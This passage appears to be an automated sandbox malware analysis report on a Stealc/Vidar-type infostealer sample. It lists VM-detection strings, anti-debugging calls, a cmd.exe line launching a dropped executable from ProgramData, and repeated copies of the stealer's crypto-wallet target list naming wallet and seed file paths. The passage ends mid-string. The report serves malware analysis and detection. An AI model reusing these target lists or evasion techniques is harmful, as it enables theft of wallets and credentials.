                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: AEBGIEGC.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                      Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.19.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.19.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: AEBGIEGC.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                      Source: Amcache.hve.19.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: AEBGIEGC.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                      Source: AEBGIEGC.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
                      Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                      Source: AEBGIEGC.0.drBinary or memory string: discord.comVMware20,11696428655f
                      Source: Amcache.hve.19.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.19.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.19.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: AEBGIEGC.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                      Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: msedge.exe, 00000007.00000003.2235748932.0000462800314000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                      Source: AEBGIEGC.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                      Source: AEBGIEGC.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                      Source: AEBGIEGC.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                      Source: AEBGIEGC.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                      Source: Amcache.hve.19.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: AEBGIEGC.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                      Source: AEBGIEGC.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                      Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: AEBGIEGC.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                      Source: msedge.exe, 00000007.00000002.2314677756.0000029958843000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: AEBGIEGC.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                      Source: AEBGIEGC.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
                      Source: AEBGIEGC.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                      Source: AEBGIEGC.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                      Source: Amcache.hve.19.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Amcache.hve.19.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.19.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: AEBGIEGC.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                      Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: AEBGIEGC.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
                      Source: AEBGIEGC.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                      Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: AEBGIEGC.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeAPI call chain: ExitProcess graph end nodegraph_0-57093
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeAPI call chain: ExitProcess graph end nodegraph_0-57107
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeAPI call chain: ExitProcess graph end nodegraph_0-57096
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeAPI call chain: ExitProcess graph end nodegraph_0-58271
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeAPI call chain: ExitProcess graph end nodegraph_0-57114
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeAPI call chain: ExitProcess graph end nodegraph_0-57115
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeAPI call chain: ExitProcess graph end nodegraph_0-56935
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeAPI call chain: ExitProcess graph end nodegraph_0-57136
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040A560 memcmp,memcmp,memset,LocalAlloc,LdrInitializeThunk,KiUserExceptionDispatcher,0_2_0040A560
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00404610 VirtualProtect ?,00000004,00000100,000000000_2_00404610
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,0_2_0040A090
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00419AA0 mov eax, dword ptr fs:[00000030h]0_2_00419AA0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,0_2_00405000
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0041B058 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041B058
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0041D21A SetUnhandledExceptionFilter,0_2_0041D21A
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0041B63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B63A
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C60B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C60B66C
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C60B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C60B1F7
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: hwWxZRwpeL.exe PID: 3552, type: MEMORYSTR
                      Searches for specific processes (likely to inject)
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_004198E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_004198E0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00419790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419790
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\ECAFHDBGHJ.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C60B341 cpuid 0_2_6C60B341
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417D20
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00418CF0 GetSystemTime,0_2_00418CF0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417BC0
                      Source: Amcache.hve.19.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.19.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Stealc
                      Source: Yara matchFile source: 0.2.hwWxZRwpeL.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hwWxZRwpeL.exe.2470e67.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hwWxZRwpeL.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.hwWxZRwpeL.exe.2550000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.hwWxZRwpeL.exe.2470e67.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.hwWxZRwpeL.exe.2550000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2589210016.000000000078E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: hwWxZRwpeL.exe PID: 3552, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: Process Memory Space: hwWxZRwpeL.exe PID: 3552, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: Jaxx Desktop (old)
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia 